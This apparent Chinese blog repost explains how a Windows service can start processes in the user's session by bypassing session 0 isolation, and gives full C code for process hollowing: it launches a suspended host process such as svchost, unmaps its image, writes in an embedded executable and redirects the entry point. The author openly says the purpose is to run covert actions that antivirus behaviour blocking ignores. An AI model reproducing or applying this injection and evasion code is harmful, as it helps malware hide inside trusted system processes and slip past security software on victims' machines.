首页 > 其他 > 详细

突破session 0隔离 和 劫持exe注入(转自梦无极)

时间:2015-07-31 09:00:53      阅读:797      评论:0      收藏:0      [点我收藏+]

代码基本源于网络,作用看个人需求。

session 0隔离是个老话题,这里简单讲讲,小伙伴们赶快看过来吧。

自vista系统开始,进程便有了session空间的概念,一般系统服务进程是在session 0的会话空间里面执行,其他应用程序都是在session 1或者session x会话空间中运行。一般情况下,进程A属于session x会话空间,那么它所创建的进程同样是属于session x会话空间。
当你写的是个系统服务的时候,由于系统服务进程处于session 0空间,所以该进程如果想创建出一个进程,那么创建出来的进程也就是属于session 0会话空间了。而session 0会话空间中能做的事情有限,比如无法显示一个操作界面,很难和用户交互。所以你必须在session 0会话空间中创建出属于非session 0会话空间的进程。
下面的代码展示了如何去做。

  3. BOOL CreateProcessS (
  4.         __in_opt    LPCWSTR lpApplicationName,
  5.         __inout_opt LPWSTR lpCommandLine,
  6.         __in_opt    LPSECURITY_ATTRIBUTES lpProcessAttributes,
  7.         __in_opt    LPSECURITY_ATTRIBUTES lpThreadAttributes,
  8.         __in        BOOL bInheritHandles,
  9.         __in        DWORD dwCreationFlags,
  10.         __in_opt    LPCWSTR lpCurrentDirectory,
  11.         __in        LPSTARTUPINFOW lpStartupInfo,
  12.         __out       LPPROCESS_INFORMATION lpProcessInformation
  13.         )
  14. {
  15.         BOOL  isSuccess = FALSE;
  16.         DWORD dwCurrentSessionId = 0;
  17.         ProcessIdToSessionId(GetCurrentProcessId(),&dwCurrentSessionId);
  19.         if (dwCurrentSessionId == 0)
  20.         {
  21.                 HANDLE        hToken = NULL;
  22.                 DWORD        dwSessionID = 0;
  23.                 LPVOID        lpEnvironment = NULL;
  24.                 HANDLE        hDuplicatedToken = NULL;
  26.                 //服务进程会话id为零,以下代码用于绕过session 0隔离
  29.                 dwSessionID = WTSGetActiveConsoleSessionId();
  31.                 // 获得当前Session的用户令牌
  32.                 if (WTSQueryUserToken(dwSessionID,&hToken) == FALSE)
  33.                 {
  34.                         goto Cleanup;
  35.                 }
  37.                 // 复制令牌
  38.                 if (DuplicateTokenEx(hToken,MAXIMUM_ALLOWED,NULL,SecurityIdentification, TokenPrimary,&hDuplicatedToken) == FALSE)
  39.                 {
  40.                         goto Cleanup;
  41.                 }
  43.                 // 创建用户Session环境
  44.                 if (CreateEnvironmentBlock(&lpEnvironment,hDuplicatedToken,FALSE) == FALSE)
  45.                 {
  46.                         goto Cleanup;
  47.                 }
  49.                 // 在复制的用户Session下执行应用程序,创建进程。
  50.                 if ((isSuccess = CreateProcessAsUser(hDuplicatedToken,lpApplicationName,lpCommandLine,lpProcessAttributes,lpThreadAttributes,bInheritHandles,\
  51.                         dwCreationFlags,lpEnvironment,lpCurrentDirectory,lpStartupInfo,lpProcessInformation) )== FALSE)
  52.                 {
  53.                         goto Cleanup;
  54.                 }
  56.                 // 清理工作
  57. Cleanup:
  58.                 if (hToken != NULL)
  59.                 {
  60.                         CloseHandle(hToken);
  61.                 }
  63.                 if (hDuplicatedToken != NULL)
  64.                 {
  65.                         CloseHandle(hDuplicatedToken);
  66.                 }
  68.                 if (lpEnvironment != NULL)
  69.                 {
  70.                         DestroyEnvironmentBlock(lpEnvironment);
  71.                 }
  72.         }
  73.         else
  74.         {
  75.                 isSuccess = CreateProcess(lpApplicationName,lpCommandLine,lpProcessAttributes,lpThreadAttributes,bInheritHandles,dwCreationFlags,NULL,lpCurrentDirectory,lpStartupInfo,lpProcessInformation);
  76.         }
  78.         return isSuccess;
  79. }
复制代码



简单吧,代码主要来自网络。

有了创建的代码还不行,因为有时候我们服务进程需要做一点儿猥琐的事情,比如创建一个傀儡进程,比如选择一个svchost作为傀儡进程,然后执行我们偷偷想要做的事情。创建傀儡进程的好处是杀毒基本不会管你傀儡进程中做什么事情,那就不用考虑行为拦截问题了。

  2. void CreatePuppetProcess(HMODULE hModule,WCHAR *pszPuppetImagePath)
  3. {
  4.         int                                i;
  5.         HRSRC                        hrSrc;
  6.         HGLOBAL                        hg;
  7.         DWORD                        dwSize;
  8. #ifdef _WIN64
  9.         WOW64_CONTEXT                ThreadContext = {0};
  10. #else
  11.         CONTEXT                        ThreadContext = {0};
  12. #endif // _WIN64
  13.         DWORD                        dwPuppetProcessImageBase = 0;
  14.         PVOID                        lpNewProcessImageBase = NULL;
  15.         SIZE_T                        NumberOfBytes = 0;
  17.         PIMAGE_DOS_HEADER                lpImageDosHeader = NULL;
  18.         PIMAGE_NT_HEADERS32                lpImageNtHeaders = NULL;
  19.         PIMAGE_SECTION_HEADER        lpImageSectionHeader = NULL;
  20.         STARTUPINFO                                StartupInfo = {0};
  21.         PROCESS_INFORMATION                ProcessInfo = {0};
  23.         ZWUNMAPVIEWOFSECTION        pfnZwUnmapViewOfSection = NULL;
  25.         StartupInfo.cb = sizeof(STARTUPINFO);
  27.         hrSrc =  FindResourceA(hModule, MAKEINTRESOURCEA(IDR_DLL1),"DLL"); 
  28.         hg = LoadResource(hModule, hrSrc);
  29.         dwSize = SizeofResource( hModule,hrSrc);
  31.         if (dwSize == 0){        return;        }
  33.         pfnZwUnmapViewOfSection = (ZWUNMAPVIEWOFSECTION)GetProcAddress(LoadLibraryA("ntdll.dll"),"ZwUnmapViewOfSection");
  34.         if (pfnZwUnmapViewOfSection == NULL){        return;        }
  36.         lpImageDosHeader = (PIMAGE_DOS_HEADER)hg;
  37.         lpImageNtHeaders = (PIMAGE_NT_HEADERS32)((ULONG_PTR)hg + lpImageDosHeader->e_lfanew);
  38.         lpImageSectionHeader = (PIMAGE_SECTION_HEADER)((ULONG_PTR)hg + lpImageDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS32));
  40.         if (CreateProcessS(pszPuppetImagePath/*L"C:\\Windows\\System32\\calc.exe"*/,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,&StartupInfo,&ProcessInfo) == FALSE)
  41.         {
  42.                 goto __exit;
  43.         }
  45.         ThreadContext.ContextFlags = CONTEXT_FULL;
  46. #ifdef _WIN64
  47.         if (Wow64GetThreadContext(ProcessInfo.hThread,&ThreadContext) == FALSE)
  48.         {
  49.                 goto __exit;
  50.         }
  51. #else
  52.         if (GetThreadContext(ProcessInfo.hThread,&ThreadContext) == FALSE)
  53.         {
  54.                 goto __exit;
  55.         }
  56. #endif // _WIN64
  59.         if (ReadProcessMemory(ProcessInfo.hProcess,(LPCVOID)(ThreadContext.Ebx + 0x8),&dwPuppetProcessImageBase,sizeof(DWORD),&NumberOfBytes) == FALSE)
  60.         {
  61.                 goto __exit;
  62.         }
  64.         if (dwPuppetProcessImageBase == lpImageNtHeaders->OptionalHeader.ImageBase)
  65.         {
  66.                 pfnZwUnmapViewOfSection(ProcessInfo.hProcess,(PVOID)dwPuppetProcessImageBase);
  67.         }
  69.         lpNewProcessImageBase = VirtualAllocEx(ProcessInfo.hProcess,\
  70.                 (LPVOID)(ULONG_PTR)lpImageNtHeaders->OptionalHeader.ImageBase,(SIZE_T)lpImageNtHeaders->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
  71.         if (lpNewProcessImageBase == NULL)
  72.         {
  73.                 int error = GetLastError();
  74.                 goto __exit;
  75.         }
  77.         if (WriteProcessMemory(ProcessInfo.hProcess,lpNewProcessImageBase,lpImageDosHeader,(SIZE_T)lpImageNtHeaders->OptionalHeader.SizeOfHeaders,&NumberOfBytes) == FALSE)
  78.         {
  79.                 goto __exit;
  80.         }
  82.         for (i = 0;i < lpImageNtHeaders->FileHeader.NumberOfSections;i++)
  83.         {
  84.                 WriteProcessMemory(ProcessInfo.hProcess,(LPVOID)((ULONG_PTR)lpNewProcessImageBase + lpImageSectionHeader[i].VirtualAddress),\
  85.                         (LPCVOID)((ULONG_PTR)hg + lpImageSectionHeader[i].PointerToRawData),(SIZE_T)lpImageSectionHeader[i].SizeOfRawData,&NumberOfBytes);
  86.         }
  88. #ifdef _WIN64
  89.         WriteProcessMemory(ProcessInfo.hProcess,(LPVOID)(ThreadContext.Ebx + 0x8),&lpNewProcessImageBase,sizeof(PVOID),&NumberOfBytes);
  90.         ThreadContext.Eax = 0;
  91.         ThreadContext.Eax = (ULONG)lpNewProcessImageBase + lpImageNtHeaders->OptionalHeader.AddressOfEntryPoint;
  92.         Wow64SetThreadContext(ProcessInfo.hThread,&ThreadContext);
  93. #else
  94.         WriteProcessMemory(ProcessInfo.hProcess,(LPVOID)(ThreadContext.Ebx + 0x8),&lpNewProcessImageBase,sizeof(PVOID),&NumberOfBytes);
  95.         ThreadContext.Eax = (DWORD)lpNewProcessImageBase + lpImageNtHeaders->OptionalHeader.AddressOfEntryPoint;
  96.         SetThreadContext(ProcessInfo.hThread,&ThreadContext);
  97. #endif // _WIN64
  98.         ResumeThread(ProcessInfo.hThread);
  100. __exit:
  102.         if (ProcessInfo.hProcess != NULL)
  103.         {
  104.                 CloseHandle(ProcessInfo.hProcess);
  105.         }
  107.         if (ProcessInfo.hThread != NULL)
  108.         {
  109.                 CloseHandle(ProcessInfo.hThread);
  110.         }
  111. }
复制代码



首先这个代码是把一个exe程序放在了资源里面,函数第一个参数的模块句柄是当前模块的句柄,如果是dll,那么就是dll的模块句柄。如果你想测试此函数效果,那么你写的就是exe程序运行此函数,这时这里的模块句柄可以为NULL。至于怎么把文件添加到资源,这里我就不讲解方法了,网上很多资料。

必须注意的是,你所要创建的傀儡进程必须是32位的,你放在资源中的exe也必须是32位的。而你调用CreatePuppetProcess函数所在的进程可以是32位或者64位。


然后通过此代码你就可以实现创建一个傀儡进程了,如果是在session 0会话空间中创建傀儡进程,这里还会实现突破session 0隔离创建进程。


小伙伴们赶紧自己去实验吧,更多内容请关注mengwuji.net后续动态。

突破session 0隔离 和 劫持exe注入(转自梦无极)

原文:http://www.cnblogs.com/15157737693zsp/p/4691116.html
(0)
(0)
   
举报
评论 一句话评论(0
分享档案
更多>
2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)
最新文章
更多>
教程昨日排行
更多>
友情链接
汇智网   PHP教程   插件网  
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!